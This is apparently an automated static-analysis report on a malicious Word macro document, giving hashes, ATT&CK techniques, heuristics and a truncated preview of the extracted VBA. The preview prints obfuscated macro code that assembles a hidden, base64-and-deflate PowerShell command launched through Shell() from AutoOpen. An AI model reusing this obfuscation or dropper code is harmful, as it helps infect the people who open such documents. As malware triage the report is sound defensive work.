Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f382a5df0a955a42…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 117.5 KB
Created: 2018-05-23 19:14:00
Authoring application: Microsoft Office Word
First seen: 2018-06-14
MD5: b7e9741450b9d7ee2b0ca03919e97962
SHA-1: a38f5f24628e7a7f3390126006581e7fed6667e2
SHA-256: f382a5df0a955a420442f8b26ecf0a1f1fa93da5a2fbe124cc6739e99547b724
Risk score: 144

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing VBA macros. Its AutoOpen macro triggers a Shell() call, which is highly suspicious. The extracted VBA script assembles and executes a PowerShell command, most likely to download and run a second-stage payload. The obfuscation of the script and the use of Shell() indicate downloader or dropper functionality.

Heuristics (6)

  • VBA macros detected (severity: medium, 2 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical) OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro (severity: high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (severity: medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (severity: info) EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 86038 bytes
SHA-256: 5488a9cae3973bf74d50e3c0723b05aaba5c5a98938741577294efa1f74a75ae
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 2 long base64-like blob(s))

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "tMJnBCi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function pwOUoRwHr()

On Error Resume Next
aFmnWdhaUq = ADlEOnuAb + CSng(878965) + 805953 / Sin(737606 - CByte(978844) / 499741 - Round(878965)) + SZBdJKzwH * WPEmPpjXMEY - (805953 + 737606 + 978844 - 8789650)
Set EoGdC = HtbbQE
UaaNKIiHcH = "AxJxiDSFfilZjdeLwsTyU2N8CFe -WinDoiRowershell mdXpdaUdu7ZAkS14IHG0e4u"
QUTEtQYK = CStr(Left(Right(UaaNKIiHcH, 33), 10)) + Left(Right(UaaNKIiHcH, 41), 6) + Left(Right(UaaNKIiHcH, 53), 4) + Left(Right(UaaNKIiHcH, 59), 1) + Left(Right(UaaNKIiHcH, 43), 2)

wQwlLY = "mPVAHMhidden  ( NLu3aEcT soY18ytySZ3w4vo9B6im8few-oBJuLFfsxO MqgVn"
ZLYqBv = Left(Right(wQwlLY, 60), 11) + Left(Right(wQwlLY, 19), 6) + Left(Right(wQwlLY, 45), 4) + Left(Right(wQwlLY, 6), 1)

lkdljiRBc = "yvmPsYstem.IODngamrLu3aXkcCsoY18ytyS.STREo9B6im8fS6"
IhSWAEoz = Left(Right(lkdljiRBc, 47), 9) + Left(Right(lkdljiRBc, 15), 5) + Left(Right(lkdljiRBc, 35), 3)

ZBTGKMKU = "yvmeAdeR(rewhDngPBNLu3aX( NsoY18y"
ZQElafvYP = CStr(Left(Right(ZBTGKMKU, 30), 6)) + CStr(Left(Right(ZBTGKMKU, 9), 3)) + CStr(Left(Right(ZBTGKMKU, 23), 2))

XjwilXj = "mPVAHMvroTh-oBJEcT IO.coMpRessytySZ3wSTreaM(m8fS6rTNQuLFfsxOXMqgVnFL6LFJQ6uPQ1q4DMRioN.DEfLaTeGmKQDysJLlcA [0vpd2tBBu"
LoSkJnA = Left(Right(XjwilXj, 106), 19) + Left(Right(XjwilXj, 34), 11) + Left(Right(XjwilXj, 80), 7) + CStr(Left(Right(XjwilXj, 11), 2))

iFBnE = "yvmPiO.MeMOrhDnAm]NLu3aXkcCsoY18ytySTrE4vo9B6im8"
SYGzrqi = Left(Right(iFBnE, 44), 8) + CStr(Left(Right(iFBnE, 14), 5)) + Left(Right(iFBnE, 33), 3)
nqzIjziVb = bZODPKkSr + CSng(109106) + 475429 / Sin(215154 - CByte(624279) / 377383 - Round(109106)) + fUwQKT * mYHFWLHu - (475429 + 215154 + 624279 - 1091060)
Set WCWYcLr = raFVUjjijV
ojcqhiZhvGi = "mPVAHMvr[CoNVErT]::FROmcCsoY1InG( '3w4vo9B6im8fS6rTNQuLFfsxOXMqgVnBAse64stRPQ1q4DMR9fZT37KO36"
QozHPwS = Left(Right(ojcqhiZhvGi, 85), 15) + Left(Right(ojcqhiZhvGi, 27), 9) + Left(Right(ojcqhiZhvGi, 64), 6) + CStr(Left(Right(ojcqhiZhvGi, 8), 1))

YBDPONAhDv = "yvmPVVbT9tKEhDvkPBNLu3aXkcCsoY18H4/0Z3w4vo9B6"
OtNAX = CStr(Left(Right(YBDPONAhDv, 41), 8)) + CStr(Left(Right(YBDPONAhDv, 13), 4)) + Left(Right(YBDPONAhDv, 31), 3)

qZYTYOPXOY = "yvVnWE7MvEtThDngPBNLuZL4kcCsoY"
IltkjLP = Left(Right(qZYTYOPXOY, 28), 5) + CStr(Left(Right(qZYTYOPXOY, 9), 3)) + Left(Right(qZYTYOPXOY, 21), 2)

iLMCGPPHRJ = Chr(43)
GmtKOnitWX = "mPVAHMvJkEgDpZEaLJEWaXkcCN8GJEytySZ3w4vo9B6im8fS6rTNQuLFfmiAeHMcBnFL6LFJQ6nPQ1q4D"
bGwvKwqS = Left(Right(GmtKOnitWX, 74), 13) + CStr(Left(Right(GmtKOnitWX, 24), 8)) + Left(Right(GmtKOnitWX, 56), 5) + Left(Right(GmtKOnitWX, 7), 1)
CqHcDawKLp = lqslAZzkI + CSng(254400) + 530029 / Sin(883296 - CByte(372612) / 268405 - Round(254400)) + BpWFiwWbmH * lwPndd - (530029 + 883296 + 372612 - 2544000)
Set BzJCkB = kkTikqKE
ClYqiOkl = "yMpVV7HMvroTv7ngPB"
WYwINW = Left(Right(ClYqiOkl, 17), 3) + Left(Right(ClYqiOkl, 6), 2) + CStr(Left(Right(ClYqiOkl, 13), 1))

NLOjzj = Chr(43)
qEANW = "mPVAHWa94xSwtJqBNLu/LNkcCsoY18ytySZ3w4vo9BLZ2d356rTNQugFfsxO"
zfztK = Left(Right(qEANW, 55), 10) + CStr(Left(Right(qEANW, 18), 6)) + CStr(Left(Right(qEANW, 41), 3)) + Left(Right(qEANW, 6), 1)

lYzXLI = "yvmabdnZXtoTh0JtPBNLu3aXkcCsoYq95mySZ3w4vo"
zdbbSprcbSH = Left(Right(lYzXLI, 39), 7) + CStr(Left(Right(lYzXLI, 12), 4)) + Left(Right(lYzXLI, 29), 3)

IRUDnKz = Chr(43)
qTQQROT = "yvzxT1H2vroThDngP83Cu3aX"
lvtYzjW = CStr(Left(Right(qTQQROT, 22), 4)) + CStr(Left(Right(qTQQROT, 7), 3)) + CStr(Left(Right(qTQQROT, 17), 1))

CtmNbUQ = Chr(43)
RmpYoAosaBv = "mPVAHMvroTazqxkVveHbjtGy71bl18ytySZU37VDnO6im8fS6rTNQuLFfsxOXMqgVnFL6LFJQ6uPQ1qt/14NClXVNKO36WGmKQDysrulcAwJ0vp"
zWqXihmsHL = Left(Right(RmpYoAosaBv, 101), 18) + Left(Right(RmpYoAosaBv, 32), 10) + CStr(Left(Right(RmpYoAosaBv, 76), 7)) + Left(Right(RmpYoAosaBv, 10), 2)
toAbGQTbpEI = RnrIj + CSng(922192) + 843582 / Sin(740701 - CByte(878191) /
... (truncated)